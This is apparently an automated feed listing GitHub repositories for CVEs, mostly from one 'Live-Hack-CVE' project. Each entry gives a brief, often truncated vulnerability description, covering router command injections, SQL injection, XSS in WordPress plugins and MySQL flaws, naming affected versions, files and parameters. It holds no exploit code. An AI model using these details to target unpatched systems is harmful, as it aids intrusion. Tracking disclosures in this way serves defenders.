**TP-Link Archer A7 Archer A7(US)_V5_210519 is affected by a command injection vulnerability in /usr/bin/tddp. The vulnerability is caused by the program taking part of the received data packet as part of the command. This will cause an attacker to execute arbitrary commands on the router. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42232](https://github.com/Live-Hack-CVE/CVE-2021-42232) create time: 2022-12-30T03:20:29Z

**The Yotpo Reviews for WooCommerce WordPress plugin through 2.0.4 lacks nonce check when updating its settings, which could allow attacker to make a logged in admin change them via a CSRF attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2555](https://github.com/Live-Hack-CVE/CVE-2022-2555) create time: 2022-12-30T04:02:55Z

**The Simple Job Board WordPress plugin before 2.10.0 is susceptible to Directory Listing which allows the public listing of uploaded resumes in certain configurations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2558](https://github.com/Live-Hack-CVE/CVE-2022-2558) create time: 2022-12-30T04:02:51Z

**The Team WordPress plugin before 4.1.2 contains a file which could allow any authenticated users to download arbitrary files from the server via a path traversal vector. Furthermore, the file will also be deleted after its content is returned to the user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2557](https://github.com/Live-Hack-CVE/CVE-2022-2557) create time: 2022-12-30T04:02:48Z

**The Advanced Custom Fields WordPress plugin before 5.12.3, Advanced Custom Fields Pro WordPress plugin before 5.12.3 allows unauthenticated users to upload files allowed in a default WP configuration (so PHP is not possible) if there is a frontend form available. This vulnerability was introduced in the 5.0 rewrite and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2594](https://github.com/Live-Hack-CVE/CVE-2022-2594) create time: 2022-12-30T04:02:44Z

**Improper access control in the firmware for some Intel(R) E810 Ethernet Controllers before version 1.6.1.9 may allow a privileged user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28709](https://github.com/Live-Hack-CVE/CVE-2022-28709) create time: 2022-12-30T04:02:41Z

**The Zoom Client for Meetings for macOS (Standard and for IT Admin) starting with version 5.7.3 and before 5.11.6 contains a vulnerability in the auto update process. A local low-privileged user could exploit this vulnerability to escalate their privileges to root. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28757](https://github.com/Live-Hack-CVE/CVE-2022-28757) create time: 2022-12-30T04:02:38Z

**Emerson Electric's Proficy Machine Edition Version 9.00 and prior is vulnerable to CWE-345 Insufficient Verification of Data Authenticity, and can display logic that is different than the compiled logic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2789](https://github.com/Live-Hack-CVE/CVE-2022-2789) create time: 2022-12-30T04:02:07Z

**A reflected cross-site scripting (xss) vulnerability exists in the charts tab selection functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26842](https://github.com/Live-Hack-CVE/CVE-2022-26842) create time: 2022-12-30T04:02:03Z

**Bluecms 1.6 has SQL injection in line 132 of admin/area.php CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37113](https://github.com/Live-Hack-CVE/CVE-2022-37113) create time: 2022-12-30T04:02:00Z

**BlueCMS 1.6 has SQL injection in line 55 of admin/model.php CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37112](https://github.com/Live-Hack-CVE/CVE-2022-37112) create time: 2022-12-30T04:01:56Z

**BlueCMS 1.6 has SQL injection in line 132 of admin/article.php CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37111](https://github.com/Live-Hack-CVE/CVE-2022-37111) create time: 2022-12-30T04:01:53Z

**Emerson Electric's Proficy Machine Edition Version 9.80 and prior is vulnerable to CWE-29 Path Traversal: '\..\Filename', also known as a ZipSlip attack, through an upload procedure which enables attackers to implant a malicious .BLZ file on the PLC. The file can transfer through the engineering station onto Windows in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2788](https://github.com/Live-Hack-CVE/CVE-2022-2788) create time: 2022-12-30T04:01:49Z

**An information disclosure vulnerability exists in the chunkFile functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28710](https://github.com/Live-Hack-CVE/CVE-2022-28710) create time: 2022-12-30T04:01:46Z

**A cross-site request forgery (CSRF) vulnerability exists in WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to increased privileges. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29468](https://github.com/Live-Hack-CVE/CVE-2022-29468) create time: 2022-12-30T04:01:43Z

**A vulnerability classified as critical has been found in SourceCodester Gym Management System. This affects an unknown part of the file login.php. The manipulation of the argument user_email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2842](https://github.com/Live-Hack-CVE/CVE-2022-2842) create time: 2022-12-30T04:01:39Z

**A PAN-OS URL filtering policy misconfiguration could allow a network-based attacker to conduct reflected and amplified TCP denial-of-service (RDoS) attacks. The DoS attack would appear to originate from a Palo Alto Networks PA-Series (hardware), VM-Series (virtual) and CN-Series (container) firewall against an attacker CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0028](https://github.com/Live-Hack-CVE/CVE-2022-0028) create time: 2022-12-30T04:01:36Z

**A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.This vulnerability exists in the Live Schedules plugin, allowing an att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34652](https://github.com/Live-Hack-CVE/CVE-2022-34652) create time: 2022-12-30T04:01:29Z

**A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.This vulnerability exists in the CloneSite plugin, allowing an attacker CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33149](https://github.com/Live-Hack-CVE/CVE-2022-33149) create time: 2022-12-30T04:01:25Z

**Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2829](https://github.com/Live-Hack-CVE/CVE-2022-2829) create time: 2022-12-30T04:01:22Z

**A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.This vulnerability exists in the aVideoEncoder functionality which can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33147](https://github.com/Live-Hack-CVE/CVE-2022-33147) create time: 2022-12-30T04:01:15Z

**A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.This vulnerability exists in the Live Schedules plugin, allowing an att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33148](https://github.com/Live-Hack-CVE/CVE-2022-33148) create time: 2022-12-30T04:01:11Z

**Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, 9.3.0.6, and 9.4.0.2, contain an unprotected primary channel vulnerability. An unauthenticated network malicious attacker may potentially exploit this vulnerability, leading to a denial of filesystem services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33932](https://github.com/Live-Hack-CVE/CVE-2022-33932) create time: 2022-12-30T04:01:08Z

**Dell PowerScale OneFS, versions 9.0.0, up to and including 9.1.0.19, 9.2.1.12, 9.3.0.6, and 9.4.0.2, contain an insecure default initialization of a resource vulnerability. A remote authenticated attacker may potentially exploit this vulnerability, leading to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32480](https://github.com/Live-Hack-CVE/CVE-2022-32480) create time: 2022-12-30T04:01:04Z

**An information disclosure vulnerability exists in the cookie functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. The session cookie and the pass cookie miss the HttpOnly flag, making them accessible via JavaScript. The session cookie also misses the secure flag, which allows the session cookie to be leake CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32778](https://github.com/Live-Hack-CVE/CVE-2022-32778) create time: 2022-12-30T04:01:00Z

**An information disclosure vulnerability exists in the cookie functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. The session cookie and the pass cookie miss the HttpOnly flag, making them accessible via JavaScript. The session cookie also misses the secure flag, which allows the session cookie to be leake CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32777](https://github.com/Live-Hack-CVE/CVE-2022-32777) create time: 2022-12-30T04:00:57Z

**Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, 9.3.0.6, and 9.4.0.2, contain a process invoked with sensitive information vulnerability. A CLI user may potentially exploit this vulnerability, leading to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31238](https://github.com/Live-Hack-CVE/CVE-2022-31238) create time: 2022-12-30T04:00:53Z

**A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.Thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32772](https://github.com/Live-Hack-CVE/CVE-2022-32772) create time: 2022-12-30T04:00:50Z

**A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.Thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32771](https://github.com/Live-Hack-CVE/CVE-2022-32771) create time: 2022-12-30T04:00:46Z

**A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.Thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32770](https://github.com/Live-Hack-CVE/CVE-2022-32770) create time: 2022-12-30T04:00:43Z

**Dell PowerScale OneFS, versions 9.2.0 up to and including 9.2.1.12 and 9.3.0.5 contain an improper preservation of permissions vulnerability in SyncIQ. A low privileged local attacker may potentially exploit this vulnerability, leading to limited information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31237](https://github.com/Live-Hack-CVE/CVE-2022-31237) create time: 2022-12-30T04:00:40Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer, a different vulnerability than CVE-2012-1703. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1690](https://github.com/Live-Hack-CVE/CVE-2012-1690) create time: 2022-12-30T03:12:47Z

**Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5.29 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Partition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1555](https://github.com/Live-Hack-CVE/CVE-2013-1555) create time: 2022-12-30T03:13:28Z

**Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-2376](https://github.com/Live-Hack-CVE/CVE-2013-2376) create time: 2022-12-30T03:13:19Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3804](https://github.com/Live-Hack-CVE/CVE-2013-3804) create time: 2022-12-30T03:13:16Z

**Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1532](https://github.com/Live-Hack-CVE/CVE-2013-1532) create time: 2022-12-30T03:13:12Z

**Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1526](https://github.com/Live-Hack-CVE/CVE-2013-1526) create time: 2022-12-30T03:13:09Z

**Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1544](https://github.com/Live-Hack-CVE/CVE-2013-1544) create time: 2022-12-30T03:12:51Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability, related to MyISAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0371](https://github.com/Live-Hack-CVE/CVE-2013-0371) create time: 2022-12-30T03:12:44Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0368](https://github.com/Live-Hack-CVE/CVE-2013-0368) create time: 2022-12-30T03:12:40Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Partition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0367](https://github.com/Live-Hack-CVE/CVE-2013-0367) create time: 2022-12-30T03:12:37Z

**Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1512](https://github.com/Live-Hack-CVE/CVE-2013-1512) create time: 2022-12-30T03:12:32Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.33 and earlier and 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-5891](https://github.com/Live-Hack-CVE/CVE-2013-5891) create time: 2022-12-30T03:12:25Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Audit Log. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3809](https://github.com/Live-Hack-CVE/CVE-2013-3809) create time: 2022-12-30T03:10:40Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Prepared Statements. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3805](https://github.com/Live-Hack-CVE/CVE-2013-3805) create time: 2022-12-30T03:10:37Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3808](https://github.com/Live-Hack-CVE/CVE-2013-3808) create time: 2022-12-30T03:10:33Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.70 and earlier, 5.5.32 and earlier, and 5.6.12 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3839](https://github.com/Live-Hack-CVE/CVE-2013-3839) create time: 2022-12-30T03:10:26Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:DDL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6520](https://github.com/Live-Hack-CVE/CVE-2014-6520) create time: 2022-12-30T03:14:13Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier, and 5.6.19 and earlier, allows remote authenticated users to affect availability via vectors related to SERVER:DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6484](https://github.com/Live-Hack-CVE/CVE-2014-6484) create time: 2022-12-30T03:13:53Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier, and 5.6.19 and earlier, allows remote authenticated users to affect availability via vectors related to SERVER:MEMORY STORAGE ENGINE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6505](https://github.com/Live-Hack-CVE/CVE-2014-6505) create time: 2022-12-30T03:13:49Z

**Unspecified vulnerability in Oracle MySQL Server 5.6.19 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:INNODB FULLTEXT SEARCH DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6564](https://github.com/Live-Hack-CVE/CVE-2014-6564) create time: 2022-12-30T03:13:46Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.37 and earlier allows remote authenticated users to affect availability via vectors related to ENARC. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2494](https://github.com/Live-Hack-CVE/CVE-2014-2494) create time: 2022-12-30T03:13:42Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.37 and earlier allows remote authenticated users to affect availability via vectors related to SROPTZR. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4207](https://github.com/Live-Hack-CVE/CVE-2014-4207) create time: 2022-12-30T03:13:39Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier and 5.6.19 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:CHARACTER SETS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4287](https://github.com/Live-Hack-CVE/CVE-2014-4287) create time: 2022-12-30T03:13:35Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier and 5.6.20 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:INNODB DML FOREIGN KEYS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6464](https://github.com/Live-Hack-CVE/CVE-2014-6464) create time: 2022-12-30T03:13:32Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.41 and earlier, and 5.6.22 and earlier, allows remote authenticated users to affect availability via vectors related to InnoDB : DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0433](https://github.com/Live-Hack-CVE/CVE-2015-0433) create time: 2022-12-30T03:14:04Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier, and 5.6.19 and earlier, allows remote authenticated users to affect availability via vectors related to DDL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0391](https://github.com/Live-Hack-CVE/CVE-2015-0391) create time: 2022-12-30T03:14:00Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.41 and earlier, and 5.6.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Encryption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0441](https://github.com/Live-Hack-CVE/CVE-2015-0441) create time: 2022-12-30T03:13:57Z

**Unspecified vulnerability in Oracle MySQL 5.7.13 and earlier allows remote administrators to affect availability via vectors related to Server: InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-3495](https://github.com/Live-Hack-CVE/CVE-2016-3495) create time: 2022-12-30T03:12:29Z

**Unspecified vulnerability in Oracle MySQL 5.6.32 and earlier and 5.7.14 and earlier allows remote administrators to affect availability via vectors related to Server: InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5507](https://github.com/Live-Hack-CVE/CVE-2016-5507) create time: 2022-12-30T03:12:21Z

**Unspecified vulnerability in Oracle MySQL 5.7.14 and earlier allows local users to affect confidentiality, integrity, and availability via vectors related to Server: Packaging. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5625](https://github.com/Live-Hack-CVE/CVE-2016-5625) create time: 2022-12-30T03:11:02Z

**A flaw was found in Foreman project. A credential leak was identified which will expose Azure Compute Profile password through JSON of the API output. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3590](https://github.com/Live-Hack-CVE/CVE-2021-3590) create time: 2022-12-30T03:14:35Z

**A flaw was found in mod_auth_mellon where it does not sanitize logout URLs properly. This issue could be used by an attacker to facilitate phishing attacks by tricking users into visiting a trusted web application URL that redirects to an external and potentially malicious server. The highest threat from this liability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3639](https://github.com/Live-Hack-CVE/CVE-2021-3639) create time: 2022-12-30T03:14:28Z

**A flaw was found in servicemesh-operator. The NetworkPolicy resources installed for Maistra do not properly specify which ports may be accessed, allowing access to all ports on these resources from any pod. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availabilit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3586](https://github.com/Live-Hack-CVE/CVE-2021-3586) create time: 2022-12-30T03:14:17Z

**Improper access control in the firmware for some Intel(R) 700 and 722 Series Ethernet Controllers and Adapters before versions 8.5 and 1.5.5 may allow a privileged user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33126](https://github.com/Live-Hack-CVE/CVE-2021-33126) create time: 2022-12-30T03:10:30Z

**vim is vulnerable to Heap-based Buffer Overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3968](https://github.com/Live-Hack-CVE/CVE-2021-3968) create time: 2022-12-30T03:10:19Z

**no description** : [Nexolanta/log4j2_CVE-2021-44228](https://github.com/Nexolanta/log4j2_CVE-2021-44228) create time: 2022-12-30T02:46:33Z

**Authenticated (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in amCharts: Charts and Maps plugin <= 1.4 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36405](https://github.com/Live-Hack-CVE/CVE-2022-36405) create time: 2022-12-30T03:20:01Z

**Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Alpine Press Alpine PhotoTile for Pinterest plugin <= 1.3.1 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36347](https://github.com/Live-Hack-CVE/CVE-2022-36347) create time: 2022-12-30T03:19:57Z

**Authenticated Arbitrary File Upload vulnerability in dmitrylitvinov Uploading SVG, WEBP and ICO files plugin <= 1.0.1 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36285](https://github.com/Live-Hack-CVE/CVE-2022-36285) create time: 2022-12-30T03:19:53Z

**Authenticated (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Roman Pronskiy's Search Exclude plugin <= 1.2.6 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36282](https://github.com/Live-Hack-CVE/CVE-2022-36282) create time: 2022-12-30T03:19:50Z

**Broken Authentication vulnerability in yotuwp Video Gallery plugin <= 1.3.4.5 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35726](https://github.com/Live-Hack-CVE/CVE-2022-35726) create time: 2022-12-30T03:19:46Z

**Authenticated (admin+) Arbitrary File Read vulnerability in XplodedThemes WPide plugin <= 2.6 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35235](https://github.com/Live-Hack-CVE/CVE-2022-35235) create time: 2022-12-30T03:19:43Z

**MDaemon Technologies SecurityGateway for Email Servers 8.5.2 is vulnerable to Cross Site Scripting (XSS) via the Blacklist endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37245](https://github.com/Live-Hack-CVE/CVE-2022-37245) create time: 2022-12-30T03:19:39Z

**MDaemon Technologies SecurityGateway for Email Servers 8.5.2 is vulnerable to Cross Site Scripting (XSS) via the whitelist endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37243](https://github.com/Live-Hack-CVE/CVE-2022-37243) create time: 2022-12-30T03:19:36Z

**MDaemon Technologies SecurityGateway for Email Servers 8.5.2 is vulnerable to Cross Site Scripting (XSS) via the data_leak_list_ajax endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37241](https://github.com/Live-Hack-CVE/CVE-2022-37241) create time: 2022-12-30T03:19:33Z

**MDaemon Technologies SecurityGateway for Email Servers 8.5.2 is vulnerable to Cross Site Scripting (XSS) via the rulles_list_ajax endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37239](https://github.com/Live-Hack-CVE/CVE-2022-37239) create time: 2022-12-30T03:19:29Z

**H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function switch_debug_info_set. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37074](https://github.com/Live-Hack-CVE/CVE-2022-37074) create time: 2022-12-30T03:19:15Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a stack overflow via the pppoeUser parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36483](https://github.com/Live-Hack-CVE/CVE-2022-36483) create time: 2022-12-30T03:19:12Z

**TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the sPort parameter in the function setIpPortFilterRules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36464](https://github.com/Live-Hack-CVE/CVE-2022-36464) create time: 2022-12-30T03:19:07Z

**TOTOLink A720R V4.1.5cu.532_B20210610 was discovered to contain a command injection vulnerability via the username parameter in /cstecgi.cgi. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36456](https://github.com/Live-Hack-CVE/CVE-2022-36456) create time: 2022-12-30T03:19:04Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a stack overflow via the sPort parameter in the function setIpPortFilterRules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36488](https://github.com/Live-Hack-CVE/CVE-2022-36488) create time: 2022-12-30T03:19:00Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a command injection vulnerability via the ip parameter in the function setDiagnosisCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36481](https://github.com/Live-Hack-CVE/CVE-2022-36481) create time: 2022-12-30T03:18:57Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a stack overflow via the command parameter in the function setTracerouteCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36480](https://github.com/Live-Hack-CVE/CVE-2022-36480) create time: 2022-12-30T03:18:53Z

**TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the command parameter in the function setTracerouteCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36463](https://github.com/Live-Hack-CVE/CVE-2022-36463) create time: 2022-12-30T03:18:50Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a command injection vulnerability via the lang parameter in the function setLanguageCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36482](https://github.com/Live-Hack-CVE/CVE-2022-36482) create time: 2022-12-30T03:18:46Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a command injection vulnerability via the host_time parameter in the function NTPSyncWithHost. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36479](https://github.com/Live-Hack-CVE/CVE-2022-36479) create time: 2022-12-30T03:18:43Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a command injection vulnerability via the hostName parameter in the function setOpModeCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36485](https://github.com/Live-Hack-CVE/CVE-2022-36485) create time: 2022-12-30T03:18:10Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a stack overflow via the function setDiagnosisCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36484](https://github.com/Live-Hack-CVE/CVE-2022-36484) create time: 2022-12-30T03:18:07Z

**TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the pppoeUser parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36465](https://github.com/Live-Hack-CVE/CVE-2022-36465) create time: 2022-12-30T03:18:03Z

**TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the ip parameter in the function setDiagnosisCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36466](https://github.com/Live-Hack-CVE/CVE-2022-36466) create time: 2022-12-30T03:18:00Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a command injection vulnerability via the FileName parameter in the function UploadFirmwareFile. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36486](https://github.com/Live-Hack-CVE/CVE-2022-36486) create time: 2022-12-30T03:17:56Z

